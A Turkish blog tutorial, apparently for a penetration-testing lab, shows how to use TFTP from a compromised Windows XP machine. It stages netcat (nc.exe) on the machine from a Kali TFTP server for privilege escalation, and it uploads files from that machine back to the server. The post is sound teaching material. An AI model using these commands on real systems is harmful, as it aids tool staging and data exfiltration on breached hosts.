| Sızılan Windows Sisteme TFTP ile Dosya İndirme | ||||||||||||||||||
| TFTP udp tabanlı bir dosya transfer protokolüdür. Windows XP ve 2003'e kadarki Windows sistemlerde tftp client varsayılan olarak gelmektedir. Ancak Windows 7 ve 2008 sonrası için tftp client ekstradan eklenmesi gereken bir tool'dur. Onun yerine bu versiyonlarda varsayılan olarak gelen ftp protokolü kullanılabilir. FTP ile dosya çekme konusunda ayrıntılı bilgi için bkz. Sızılan Windows Sisteme FTP ile Dosya İndirme
TFPT client'ları Windows XP ve 2003'e kadarki windows sistemlerde varsayılan olarak yer aldığından dolayı bu sistemlere sızıldığı vakit sızılan sistemin komut satırından tftp client'ı kullanılarak kendi makinamızdaki dosyaları sızılan sisteme indirebiliriz. Böylelikle hak yükseltme gibi çeşitli işlemler yapabiliriz. Uygulama 1 (+) Birebir uygulanmıştır ve başarıyla gerçekleştirilmiştir. Şimdi Windows XP (Dandik) makinasına tftp client ile Kali'den dosya çekelim.
Gereksinimler
Öncelikle Kali sanal makinasının kök dizininde bir tane tftp klasörü açalım. Ardından tftp daemon'ını bu dizinde başlatalım.
Kali (Eski) Konsol:
mkdir /tftp atftpd --daemon --port 69 /tftp Not: /tfpt dizini dosya sisteminin kökünde oluşturulmadığı takdirde dosya transferi yapılamamaktadır. Yapılabilmesi için ekstradan konfigurasyon ayarları yapılması gerekmekteymiş. Ayrıntılı bilgi için bkz. https://social.technet.microsoft.com/Forums/windows/en-US/afc5994a-71b0-42c6-a9e0-fc3a2ac95f88/windows-wds-2008-r2-64bit-tftp-error-code-4-access-violation-message-when-we-try-to-get-files?forum=winserversetup Böylece Kali sanal makinasında tftp sunucusu başlatılmış olacaktır. Şimdi kali'de yer alan nc.exe dosyasını /tftp dizini içine kopyalayalım.
Kali (Eski) Konsol:
Ardından Windows XP (Dandik) sanal makinasinden Kali'deki TFPT sunucusunda olan nc.exe dosyasını çekelim.
cp /usr/share/windows-binaries/nc.exe /tftp/
Windows XP (Dandik) Konsol:
tftp -i 172.16.3.89 get nc.exe // Kali IP'si konur. Output Aktarım başarılı: 1 saniyede 59392 bayt, 59392 bayt/s Böylece windows sisteminde bulunulan dizine nc.exe dosyası gelecektir. Sonuç olarak bu işlem ile sızılan bir windows makinasının komut satırı üzerinden kendisinde varsayılan olarak var olan tftp client ile dosya upload'lama yapılabileceği görülmüştür ve bu sayede sistemde hak yükseltme gibi işlemlerin gerçekleştirilebileceği görülmüştür.. Uygulama 2 (+) Birebir uygulanmıştır ve başarıyla gerçekleştirilmiştir. TFTP ile dosya çekebildiğimiz gibi dosya yükleye de biliriz. Şimdi Windows XP (Dandik) sanal makinasından TFPT sunucusuna (Kali (Eski)'ye) dosya yükleyelim.
Gereksinimler
Bu işlem için Kali kök dizininde tftp adlı bir klasör oluştaralım ve iznini 777 yapalım. Ardından tftp daemon'ını bu dizinde başlatalım.
Kali (Eski) Konsol:
mkdir /tftp chmod -R 777 /tftp atftpd --daemon --port 69 /tftp Not: /tfpt dizini dosya sisteminin kökünde oluşturulmadığı takdirde dosya transferi yapılamamaktadır. Yapılabilmesi için ekstradan konfigurasyon ayarları yapılması gerekmekteymiş. Ayrıntılı bilgi için bkz. https://social.technet.microsoft.com/Forums/windows/en-US/afc5994a-71b0-42c6-a9e0-fc3a2ac95f88/windows-wds-2008-r2-64bit-tftp-error-code-4-access-violation-message-when-we-try-to-get-files?forum=winserversetup Böylece TFTP sunucumuz dosya almaya müsait duruma gelecektir. Şimdi Windows XP (Dandik)'ten bir txt dosyasını TFTP sunucusuna (Kali(Eski)'ye) gönderelim.
Windows XP (Dandik):
tftp -i 172.16.3.89 put deneme.txt deneme.txt // Kali IP'si konur.
^ ^
| |
(Upload'lanacak Dosya ) (Hedef sistemdeki ismi)
Output: Aktarım başarılı: 1 saniyede 7 bayt, 7 bayt/s Görüldüğü üzere dosya upload'lama işlemi tamamlanmıştır. Kali (Eski)'de /tftp dizinine bakıldığında yüklenen dosya görünecektir.
Kali /tftp dizini:
deneme.txt Yararlanılan Kaynaklar
|
||||||||||||||||||
Bu yazı 08.04.2026 tarihinde, saat 10:04:51'de yazılmıştır.
|
||||||||||||||||||
|
||||||||||||||||||
| Yorumlar |
||||||||||||||||||
| Henüz yorum girilmemiştir. | ||||||||||||||||||
| Yorum Ekle | ||||||||||||||||||
|
|
|||
| -> | Genel | ||
| -> | Webgoat Uygulaması | ||
| -> | DVWA Uygulaması | ||
| -> | Çeşitli Sızma Teknikleri | ||
| -> | Siber Güvenlik Araçları | ||
| -> | Linux Temelleri | ||
| -> | Siber Güvenlik Genel Kültür | ||
| -> | Kaynak Kod Analizi | ||
|
|
|||
|
|